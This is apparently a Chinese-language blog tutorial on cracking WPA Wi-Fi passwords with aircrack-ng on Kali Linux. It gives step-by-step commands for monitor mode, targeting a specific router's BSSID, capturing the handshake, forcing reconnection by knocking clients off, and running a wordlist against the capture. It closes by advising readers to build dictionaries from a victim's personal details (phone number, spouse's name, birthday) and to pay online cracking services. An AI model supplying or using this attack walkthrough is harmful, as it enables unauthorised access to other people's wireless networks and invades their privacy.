現在90%的wifi都是采用的wpa的認證保護方式,我只見過一個用wep的,所以我們先把骨頭扔一邊,先來啃一下這塊牛肉。
WPA :Wi-Fi Protected Access,中文譯名為Wi-Fi網絡安全存取,WPA可保證WLAN用戶的數據受到保護,并且只有授權的網絡用戶才可以訪問WLAN網絡。
每個制度都有他的漏洞
我們先來講一下最常見的破解方式,使用aircrack套件來抓包跑字典
?????????????????????????????????????????????? 搭建環境
1.一臺路由器,使用wpa加密
2.kali系統
3.無線網卡
??????????????????????????????????????????????? 開始實現
1.加載網卡進入虛擬機
2.輸入ifconfig -a
發現wlan0,說明網卡加載成功,不一定名字非得是這個才行,加載成功了就ok
3.輸入airmon-ng start wlan0,打開混雜模式
系統說讓我們關一下那些進程,那我們就關一下
4.輸入airodump-ng wlan0mon查看一些周圍無線網絡狀況,找到我們要攻擊的網絡,記錄BSSID和CH
今天用110來試試手,bssid:C8:3A:35:2B:B0:88,ch:8
ctrl+c結束此過程
5.輸入airodump-ng -c 8 --bssid C8:3A:35:2B:B0:88 -w /root wlan0mon
kali的命令行下是區分大小寫的。
出現右上角的那個說明抓包成功,包是以.cap結尾的
6.把包從計算機中移到主文件夾下,現在開始跑字典
輸入aircrack-ng? -w /usr/share/wordlists/fasttrack.txt ~/root-01.cap
參數:
-w:指定字典,現在最新的2017版kali下有很多字典,你也可以自己做字典上傳上去
前面的是字典路徑,后面的是剛剛抓的wpa連接包的路徑。有時候你找不到他或者不知道他的路徑,你就移到主文件夾下,主文件夾的路徑為/root
其中有時候你很長時間抓不到他的握手包,你可以用我們之前學過的各種斷網命令,斷一下然后他就會重新握手。
???????????????????????????????????????? 實驗總結
其實跑字典是很不明智的,不僅靠字典的強大,更要有強大的計算機和一點點的運氣成分,如果wifi密碼設成15df#$326ryyu&*$2這種的,數字加字母加特殊符號十幾位的,很難被破出來。
如果實在要破解一個人的wifi,先搜集信息,手機號,愛人姓名,生日,再加上常規的一些弱密碼做出來一個字典,先拿這個簡易的字典跑一下,如果跑不出來,就去找一下網上的一些專業跑包組織,跑不出來不要錢,一般跑一個包也就要10元錢。
之后我會說一些社會工程學盜wifi密碼的,人性是系統中最薄弱的環節
閑著無聊去看一下米特尼克的事跡吧,很傳奇的一個人,他還有一本書《欺騙的藝術》,我看著里面的各種吹逼,看一半就看不下去了,跳著看完了,但那就是人家的真實情景,所以我是服服帖帖的沒話說....還有一本書《社會工程學2》,從淘寶上買影印版的,這個是個中國人寫的書,符合中國國情,直接搬過來都能用。